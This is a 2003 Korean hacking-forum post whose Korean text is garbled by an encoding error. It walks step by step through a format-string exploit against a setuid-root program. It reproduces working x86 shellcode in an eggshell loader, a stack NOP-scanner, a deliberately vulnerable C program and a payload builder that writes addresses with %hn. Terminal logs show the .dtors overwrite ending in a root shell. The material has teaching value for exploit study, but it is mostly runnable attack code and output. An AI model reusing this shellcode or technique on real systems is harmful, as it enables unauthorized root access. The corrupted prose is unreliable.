http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=99 [º¹»ç]
Á¦°¡ »ê Ã¥¿¡ÀÖ´ø ¼³¸íÀÔ´Ï´Ù..
1. Eggshell
ÀÌ ÄÚµå´Â ½©Äڵ带 ¸Þ¸ð¸®¾ÈÀ¸·Î º¹»çÇϱâ À§Çؼ »ç¿ëµÈ´Ù.
"Format String Attack on alpha system" ¿¡¼ ÄÚµåÀÇ ÀϺθ¦ Âü°í ÇÏ¿´´Ù.
-----------------egg.c--------------------------
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define DEF_EGGSIZE 4096
#define DEF_ALIGN 5
char nop[] = { 0x90 };
static char shellcode[] =
"\x6a\x17\x58\x31\xdb\xcd\x80\x31"
"\xd2\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x8d\x42\x0b\xcd\x80";
int
main( int argc, char *argv[] )
{
char *eggbuf, *buf_ptr;
int align, i, eggsize ;
align = DEF_ALIGN;
eggsize = DEF_EGGSIZE ;
if ( argc < 2 ) {
printf ("%s <align> <size>\n", argv[0] );
exit(0);
}
if ( argc > 1 )
align = DEF_ALIGN + atoi(argv[1]);
if ( argc > 2 )
eggsize = atoi(argv[2]) + DEF_ALIGN ;
if ( (eggbuf = malloc( eggsize )) == NULL ) {
printf ("error : malloc \n");
exit (-1);
}
/* set egg buf */
memset( eggbuf, (int)NULL , eggsize );
for ( i = 0; i < 250 ; i++ )
strcat ( eggbuf, nop );
strcat ( eggbuf, shellcode );
for ( i =0 ; i < align ; i++ )
strcat ( eggbuf, "A");
memcpy ( eggbuf, "S=", 2 );
putenv ( eggbuf );
system("/bin/sh");
}
--------------------------end here----------------------------------------
2. "find.c" À» ÀÌ¿ëÇÏ¿© ¿©·¯ºÐÀº ½ºÅÿ¡¼ÀÇ ½©ÄÚµåÀÇ À§Ä¡¸¦ ¾Ë ¼ö ÀÖ´Ù(GOOBLES
screen-exploit ·Î ºÎÅÍ).
¶ÇÇÑ ¾Æ·¡¿Í °°Àº ¹æ¹ýÀ¸·Îµµ ÁÖ¼Ò¸¦ ¾Ë¾Æ³¾ ¼ö ÀÖ´Ù.
a) gdb ./vuln
b) set args %s%s%s%s%s%s%s%s%s%s
c) run
d) gdb say vuln exit with an error
e) x/2000 $ebp
f) serch the memory location with the nops(0x90).
-------------------------find.c-----------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*Thanks to GOBBLES for the code*/
unsigned long get_sp(void)
{ __asm__ ("movl %esp, %eax");
}
int i=0;
char *pointer;
char *nops = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
main(){
fprintf(stderr, ". SUCHE!\n");
pointer = (char *)get_sp();
while((i = strncmp(pointer, nops, strlen(nops))) != 0)
pointer++;
if(i == 0) {
fprintf(stderr, "Shellcode ist bei ----> : 0x%lx\n", pointer+1);
return;
}
else {
fprintf(stderr, "Sorry nimm GDB\n");
return;
}
}
--------------------------end here------------------------------------------
3. ÀÌ°ÍÀº ¹ö±×¸¦ Áý¾î³ÖÀº ÇÁ·Î±×·¥ÀÌ´Ù.
ÇÊÀÚ´Â ÀÌ°ÍÀ» Christophe BLAESS Christophe GRENIERFredereric RAYNALÀÇ "What are format bugs ?" ºÎÅÍ ÂüÁ¶Çß´Ù.
¾Æ¸¶µµ ÃÖ°íÀÇ Áöħ¼·Î Æò°¡µÈ´Ù.
--------------------------vuln.c------------------------------------------
/* vuln.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int helloWorld();
int accessForbidden();
int vuln(const char *format)
{
char buffer[128];
int (*ptrf)();
memset(buffer, 0, sizeof(buffer));
printf("helloWorld() = %p\n", helloWorld);
printf("accessForbidden() = %p\n\n", accessForbidden);
ptrf = helloWorld;
printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);
snprintf(buffer, sizeof buffer, format);
printf("buffer = [%s] (%d)\n", buffer, strlen(buffer));
printf("after : ptrf() = %p (%p)\n", ptrf, &ptrf);
return ptrf();
}
int main(int argc, char **argv) {
int i;
if (argc <= 1) {
fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
exit(-1);
}
for(i=0;i<argc;i++)
printf("%d %p\n",i,argv[i]);
exit(vuln(argv[1]));
}
int helloWorld()
{
printf("Welcome in \"helloWorld\"\n");
fflush(stdout);
return 0;
}
int accessForbidden()
{
printf("You shouldn't be here \"accesForbidden\"\n");
fflush(stdout);
return 0;
}
------------------------------end here-------------------------------
4. ÀÌ°Í ¿ª½Ã "What are format bugs ?" ·Î ºÎÅÍ °¡Á®¿ÔÀ¸¸ç ¸¶Áö¸· °ü¹®ÀÎ Formatstringbuilder "builder.c" ÀÌ´Ù.
ÇÁ·Î±×·¡¹ÖÀÌ µÇ½Ã´Â ºÐµéÀº ¼öÀÛ¾÷À¸·Î ÄÚµùÇؼ ½áµµ ¹«¹æÇÏ´Ù.
-----------------------------builder.c------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
/**
The 4 bytes where we have to write are placed that way : HH HH LL LL
The variables ending with "*h" refer to the high part of the word (H)
The variables ending with "*l" refer to the low part of the word (L)
*/
char* build(unsigned int addr, unsigned int value, unsigned int where) {
unsigned int length = 128; //too lazy to evaluate the true length ...
unsigned int valh;
unsigned int vall;
unsigned char b0 = (addr >> 24) & 0xff;
unsigned char b1 = (addr >> 16) & 0xff;
unsigned char b2 = (addr >> 8) & 0xff;
unsigned char b3 = (addr ) & 0xff;
char *buf;
/* detailing the value */
valh = (value >> 16) & 0xffff; //top
vall = value & 0xffff; //bottom
fprintf(stderr, "adr : %d (%x)\n", addr, addr);
fprintf(stderr, "val : %d (%x)\n", value, value);
fprintf(stderr, "valh: %d (%.4x)\n", valh, valh);
fprintf(stderr, "vall: %d (%.4x)\n", vall, vall);
/* buffer allocation */
if ( ! (buf = (char *)malloc(length*sizeof(char))) ) {
fprintf(stderr, "Can't allocate buffer (%d)\n", length);
exit(EXIT_FAILURE);
}
memset(buf, 0, length);
/* let's build */
if (valh < vall) {
snprintf(buf,
length,
"%c%c%c%c" /* high address */
"%c%c%c%c" /* low address */
"%%.%hdx" /* set the value for the first %hn */
"%%%d$hn" /* the %hn for the high part */
"%%.%hdx" /* set the value for the second %hn */
"%%%d$hn" /* the %hn for the low part */
,
b3+2, b2, b1, b0, /* high address */
b3, b2, b1, b0, /* low address */
valh-8, /* set the value for the first %hn */
where, /* the %hn for the high part */
vall-valh, /* set the value for the second %hn */
where+1 /* the %hn for the low part */
);
} else {
snprintf(buf,
length,
"%c%c%c%c" /* high address */
"%c%c%c%c" /* low address */
"%%.%hdx" /* set the value for the first %hn */
"%%%d$hn" /* the %hn for the high part */
"%%.%hdx" /* set the value for the second %hn */
"%%%d$hn" /* the %hn for the low part */
,
b3+2, b2, b1, b0, /* high address */
b3, b2, b1, b0, /* low address */
vall-8, /* set the value for the first %hn */
where+1, /* the %hn for the high part */
valh-vall, /* set the value for the second %hn */
where /* the %hn for the low part */
);
}
return buf;
}
int
main(int argc, char **argv) {
char *buf;
if (argc < 3)
return EXIT_FAILURE;
buf = build(strtoul(argv[1], NULL, 16), /* adresse */
strtoul(argv[2], NULL, 16), /* valeur */
atoi(argv[3])); /* offset */
fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
printf("%s", buf);
return EXIT_SUCCESS;
}
------------------------------------end here------------------------------------
ÀÚ..ÀÌÁ¦ºÎÅÍ ½½½½ ½ÃÀÛÇغ¸ÀÚ.
¿ì¼± ´ÙÀ½°ú °°Àº ¸í·É¾î·Î ÄÄÆÄÀÏ Çغ¸ÀÚ.
gcc -o vuln vuln.c
±×¸®°í setuid ·çÆ®ÀÇ ±ÇÇÑÀ» ÁØ´Ù.
chown root.root vuln
chmod 4775 vuln
hn> ls -la
insgesamt 91
drwxr-xr-x 2 exp users 253 Apr 27 16:16 .
drwx------ 21 exp users 2240 Apr 27 16:32 ..
-rwxr-xr-x 1 exp users 15204 Apr 27 15:53 build
-rw-r--r-- 1 exp users 3804 Apr 26 19:25 build.c
-rw-r--r-- 1 exp users 36 Apr 26 19:26 chmod.txt
-rw-r--r-- 1 exp users 34 Apr 26 19:27 dtors.tct
-rwxr-xr-x 1 exp users 14756 Apr 27 15:42 egg
-rw-r--r-- 1 exp users 1377 Apr 26 19:25 egg.c
-rwxr-xr-x 1 exp users 14121 Apr 27 16:04 find
-rw-r--r-- 1 exp users 748 Apr 27
-rwsrwxr-x 1 root root 15028 Apr 27 15:54 vuln
-rw-r--r-- 1 exp users 1009 Apr 26 19:55 vuln.c
vuln ÀÌ setuid root ·Î ¼³Á¤ÀÌ µÇ¾î ÀÖÀ½À» º¼ ¼ö ÀÖ´Ù.
2. eggshell À» ½ÃÀÛÇÑ´Ù(ÇöÀç ½ºÅþȿ¡ ÀÖÀ½).
hn> ./egg 5 6000
sh-2.05$
´Ù¸¥ Ãë¾àÁ¡À» »ç¿ëÇÒ ¼öµµ ÀÖÀ¸´Ï °¢ÀÚ Çغ¸µµ·Ï...
3. vuln À¸·Î ºÎÅÍ .dtors ¼½¼ÇÀ» ã´Â´Ù(ÀÌ°ÍÀÌ ¿À¹ö¶óÀÌÆ®¸¦ ÇÒ ¸Þ¸ð¸®ÀÇ ÁÖ¼ÒÀÌ´Ù).
sh-2.05$ objdump -s -j .dtors vuln
vuln: file format elf32-i386
Contents of section .dtors:
8049a64 ffffffff 00000000 ........
sh-2.05$
¿©±â¼ À§Ä¡´Â 0x8049a64+4=0x8049a68 ÀÌ´Ù(¸Å¹ø 4À» ´õÇØ¾ß ÇÑ´Ù "Overwriting the .dtors section."¸¦ ÂüÁ¶Çϱ⠹ٶõ´Ù).
4.3¹ø°ú ¸¶Áö¸· ÀÎÀÚ´Â ¿ÀÇÁ¼ÂÀÌ´Ù.
°¢ ¹Ú½º¿¡ µû¶ó ÀÌ ¿ÀÇÁ¼ÂÀ» ´Þ¶óÁø´Ù.
ÇÊÀÚ´Â ¾Æ·¡¿Í °°ÀÌ ¼öµ¿À¸·Î ã´Â¹ýÀ» ÅÃÇß´Ù.
sh-2.05$ ./vuln AAAA%6\$x
0 0xbffff690
1 0xbffff697
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0
before : ptrf() = 0x8048780 (0xbffff3cc)
buffer = [AAAA4000b07e] (12)
after : ptrf() = 0x8048780 (0xbffff3cc)
Welcome in "helloWorld"
sh-2.05$ ./vuln AAAA%7\$x
0 0xbffff690
1 0xbffff697
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0
before : ptrf() = 0x8048780 (0xbffff3cc)
buffer = [AAAA8048780] (11)
after : ptrf() = 0x8048780 (0xbffff3cc)
Welcome in "helloWorld"
sh-2.05$ ./vuln AAAA%8\$x
0 0xbffff690
1 0xbffff697
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0
before : ptrf() = 0x8048780 (0xbffff3cc)
buffer = [AAAA41414141] (12) <--------- ¹ß°ß !!! A´Â16Áø¼ö·Î 41 À̱⠶§¹®¿¡
after : ptrf() = 0x8048780 (0xbffff3cc)
Welcome in "helloWorld"
¿©·¯ºÐÀº ¿©±â¼ ¿ÀÇÁ¼ÂÀÌ 8À̶ó´Â °ÍÀ» ¾Ë¼ö°¡ ÀÖ´Ù.
Âü°í : ¿©·¯ºÐÀº ÇÊÀÚ°¡ 6¿¡¼ ½ÃÀÛÇÑ°ÍÀ» µû¶óÇÏÁö ¸»°í 1ºÎÅÍ ÇØ º¸½Ã±â ¹Ù¶õ´Ù.
5. ÀÚ ÀÌÁ¦ ¿©±â¼ ¿ì¸®´Â 0x8049a68 ¿¡ ½á³ÖÀ» ½©ÄÚµåÀÇ À§Ä¡¸¦ ¾Ë¾Æ³»¾ß ÇÑ´Ù.
sh-2.05$ ./find
. SUCHE!
Shellcode ist bei ----> : 0xbffffbae
6. µåµð¾î Áغñ´Â ³¡³µ´Ù.
Áö±Ý±îÁö ¿ì¸®´Â ´ÙÀ½°ú °°Àº 3°³ÀÇ ÀÎÀÚµéÀ» ¾ò¾î³Â´Ù.
- where(0x8049a68)
- what(0xbffffbae)
- Offset(8)
¿©±â¼ Á¦ÀÏ ³ªÁßÀÇ »ç¿ëÀÚ¸¦ ´ÙÀ½°ú °°ÀÌ Ã¼Å©ÇÑ´Ù.
sh-2.05$ whoami
exp
±×¸®°í °ø°ÝÀ» ½ÃÀÛÇÑ´Ù.
sh-2.05$ ./vuln `./build 0x8049a68 0xbffffbae 8`
adr : 134519400 (8049a68)
val : -1073742930 (bffffbae)
valh: 49151 (bfff)
vall: 64430 (fbae)
[jh%.49143x%8$hn%.15279x%9$hn] (34)
0 0xbffff676
1 0xbffff67d
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0
before : ptrf() = 0x8048780 (0xbffff3bc)
buffer = [jh00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000] (127)
after : ptrf() = 0x8048780 (0xbffff3bc)
Welcome in "helloWorld"
sh-2.05# whoami
root <--------------- ·çÆ® ȹµæÇÑ °ÍÀ» º¼ ¼ö ÀÖ´Ù.!!!!!!
Âü°í : ¿©±â¼ ¼Ò°³ÇÏ´Â ¸ðµç ÀÎÀÚ´Â »óȲ¿¡ µû¶ó ´Þ¶óÁú ¼ö ÀÖ´Ù.
¾î¶°ÄÉ ÇÏ´ÂÁöµµ À߸ô°Ú¾î¿© Á¦¹ß¹æ¹ýÁ» |
Hit : 3699 Date : 2003/12/30 05:03
|